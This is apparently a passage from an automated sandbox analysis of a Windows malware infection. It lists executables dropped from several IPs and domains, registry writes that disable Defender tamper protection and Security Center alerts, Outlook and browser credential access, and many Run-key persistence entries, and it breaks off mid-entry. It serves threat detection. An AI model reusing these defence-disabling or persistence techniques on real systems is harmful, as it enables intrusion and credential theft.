C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_9e2e458b4a1342fb9edcd9ff342c26df.lnk UUSIService.exe -
Executes dropped EXE 46 IoCs
Processes:
http185.215.113.66newtpp.exe.exehttp185.215.113.66pei.exe.exehttpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exehttp87.120.84.38txttIelklVKfumqUfa.exe.exehttpproxy.siteterbaru.xyzcss0a839761915d.exe.exesysppvrdnvs.exeUUSIService.exeEdgeUpdaters.exe1677919094.exehttp146.70.24.213do1654365431.exe.exehttp146.70.24.213do1654365431.exe.exehttp185.215.113.2058080markdef.exe.exehttp185.215.113.103offrandom.exe.exehttp185.215.113.103offdef.exe.exehttp185.215.113.100offdef.exe.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp87.120.84.38txttIelklVKfumqUfa.exe.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exehttp185.215.113.100offrandom.exe.exehttpeficienciaeningenieria.com.mxvnklng5th.exe.exehttpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exehttpeficienciaeningenieria.com.mxngqwplngown.exe.exehttpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exehttp46.8.229.59thebiggetlab.exe.exeis-A504O.tmpmiddlemediaplayer32.exehttp87.120.84.38txtfWAcz73TNXEbaJ2.exe.exehttpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exehttp87.120.84.38txtfWAcz73TNXEbaJ2.exe.exeInformationCheck.exeInformationCheck.exehttp185.215.113.26JavUmar.exe.exehttp154.12.82.11808win.exe.exejsc.exejsc.exehttp103.130.147.211Filesjgt.exe.exehttpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe1372228982.exehttpmkas.rizwanmano.comrevada66af9bdbf0f60_Team.exe.exe1240923462.exeservice123.exeupdater.exed473b7p95cz11a49ejc7kqwx.exepid Process 5044 http185.215.113.66newtpp.exe.exe 2940 http185.215.113.66pei.exe.exe 4396 httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe 4444 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe 3500 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe 880 http87.120.84.38txttIelklVKfumqUfa.exe.exe 3316 httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe 1552 sysppvrdnvs.exe 544 UUSIService.exe 2556 EdgeUpdaters.exe 3436 1677919094.exe 4400 http146.70.24.213do1654365431.exe.exe 3328 http146.70.24.213do1654365431.exe.exe 916 http185.215.113.2058080markdef.exe.exe 8 http185.215.113.103offrandom.exe.exe 1036 http185.215.113.103offdef.exe.exe 3488 http185.215.113.100offdef.exe.exe 3628 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe 3196 http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe 4520 http87.120.84.38txttIelklVKfumqUfa.exe.exe 3012 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe 2408 http185.215.113.100offrandom.exe.exe 4296 httpeficienciaeningenieria.com.mxvnklng5th.exe.exe 1976 httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe 4056 httpeficienciaeningenieria.com.mxngqwplngown.exe.exe 4340 httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe 1876 http46.8.229.59thebiggetlab.exe.exe 4772 is-A504O.tmp 1356 middlemediaplayer32.exe 4392 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe 1072 httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe 4752 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe 1764 InformationCheck.exe 2924 InformationCheck.exe 220 http185.215.113.26JavUmar.exe.exe 4328 http154.12.82.11808win.exe.exe 2148 jsc.exe 1100 jsc.exe 3940 http103.130.147.211Filesjgt.exe.exe 4324 httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe 4432 1372228982.exe 2724 httpmkas.rizwanmano.comrevada66af9bdbf0f60_Team.exe.exe 4332 1240923462.exe 3340 service123.exe 4820 updater.exe 4768 d473b7p95cz11a49ejc7kqwx.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
http185.215.113.2058080markdef.exe.exehttp185.215.113.103offrandom.exe.exehttp185.215.113.103offdef.exe.exehttp185.215.113.100offdef.exe.exehttp185.215.113.100offrandom.exe.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine http185.215.113.2058080markdef.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine http185.215.113.103offrandom.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine http185.215.113.103offdef.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine http185.215.113.100offdef.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine http185.215.113.100offrandom.exe.exe -
Loads dropped DLL 2 IoCs
Processes:
is-A504O.tmpservice123.exepid Process 4772 is-A504O.tmp 3340 service123.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Processes:
sysppvrdnvs.exehttp185.215.113.2058080markdef.exe.exehttp185.215.113.103offrandom.exe.exehttp185.215.113.103offdef.exe.exehttp185.215.113.100offdef.exe.exehttp185.215.113.100offrandom.exe.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" http185.215.113.2058080markdef.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" http185.215.113.103offrandom.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" http185.215.113.103offdef.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" http185.215.113.100offdef.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features http185.215.113.2058080markdef.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" http185.215.113.100offrandom.exe.exe -
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
Processes:
http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exehttp87.120.84.38txttIelklVKfumqUfa.exe.exehttp154.216.19.160txtaeGTitPRCz9BKKQ.exe.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txttIelklVKfumqUfa.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txttIelklVKfumqUfa.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txttIelklVKfumqUfa.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe -
Adds Run key to start application 2 TTPs 64 IoCs
Processes:
UUSIService.exehttp154.216.19.160txtUm9L61WgOApLFKJ.exe.exehttp185.215.113.66newtpp.exe.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_7dd4c94dea354cf4befb743ced6e3b61 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_3961205f4eaf428bb23c8ff0d715d6cc = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_4f9e795654a0458c8d851c416dd92a82 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_c6baa35c43a34753b204a8ea94cbfc8e = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_7485957d56f74cc6a724017e4e3cea7a = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_f01562837ebd4db888e631aafc8fa8f6 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Host = "C:\\Program Files (x86)\\DHCP Host\\dhcphost.exe" http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_759d9a8d1a424da2a2ceceb005cd0f72 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_b4247c78ea1f41ddb6013e5de5619d00 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_84ab3d7be5644022a8f087b469bc4128 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_7e08de7e73fc413e85c7a2b32d247c9d = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_e183d47d6f7244b6aad19717a6674a5e = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_dbd0dfa7950f4c09981e40ef1b544e12 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_a0ae3971b5934d6d94a9a7e01b3b8c67 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_e164b1990ab443368270572ef4c4d1ff = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_9220a4e8af69495280580a6a3d763968 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_0cd9bfec339840a09611439ef8bb1c57 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_017ec0c221fd49b5b43886421bde2c5d = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_2018da5fdc254adb897a2f560c933f14 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_4556c7232db747918547c6a04ab091c5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_e76d4836067442f09dd1a27f2611fb5a = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_ff652ab3c2e64409a2d140d65f4fcd24 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_e4ba265b053c4fdbb44989634a5e6b50 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_96cd936b99b744288acd147d6151f51d = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_9b7b0c69c2ae4b4186313bbf79908ba9 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_a8f7e16793eb4118a01d34d172e7209e = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_707fcc3881774a869a9685349444e94c = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_6c7b072be4034e1fb29f79cce5abd800 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_ee4dd4f3536446109417529194e225a3 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_cb5bf3cfe97648d7893daa173743ca2d = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" http185.215.113.66newtpp.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_47ee688eb0ec48b0855e609aa458174e = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_433946493b684db4b3978df8f33208b3 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_db459cd70b424492b4d8bf663187bdd5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_5df72cc0783d47daad30bdd1a4b33453 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_3656e5877db44e67a5438d089f40f094 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_00caabde884b45948c1a853f60ed9aa3 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_a2105a3a54ce402cbdd379f4c855703a = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_db5d8463f00d4f9b80c951068fa42db1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_6b31bf87f5c2449d8d0f8bb7dabe8d71 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_397349f8e16b40a8a240984f60a57b32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_4ef95e713828422984bfbe385cfd2d37 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_ff8d1fecfcb6401ead96353c3372bdf0 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_1c308792dc3e4bcca807493c82420d1b = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_87b4a687fc8049f59a96d68dd036d4a5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_883232a6e551427f8efa58fac1ece1e5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_904ba9ab45f74c38a1dcb72a994e6366 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_748219a6683d4fc3b9a9d03091669430 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_a68f49e8c95b4d61950085e5e7d7ca42 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_b436d71ae15c454693ca1daba90cbc92 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_1bf4d18df4e3429786ebb5d63296ac55 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_1d2eadbf6a2e4d2cbd238ad3e408b614 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_c17abc1355534c5e939b6edd1094139e = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_50029b3f13d9484695453f029278659d = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_98ae60b3789b4aa4b53155bcf0fa13e1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_ac124e46d6f141b7808a0e0ac5b8004c = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_dba81a9e88f5428b9a02a3a89e0f7541 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_5d9d79a9ebdd443c802f70b8a9edaa39 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_0079d1e761bc4f45a7e812967eaa9718 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_c7a2afbee6e94e5ea4ed791295106b06 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_90d38f03649846d7b728a56704079c84 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_441deebe3bd9457c832545d955de2e62 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UUSIService_f7e205e7dda5473b97b4dcd61a2d9a57 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeUpdater\\UUSIService.exe" UUSIService.exe Set value (str) 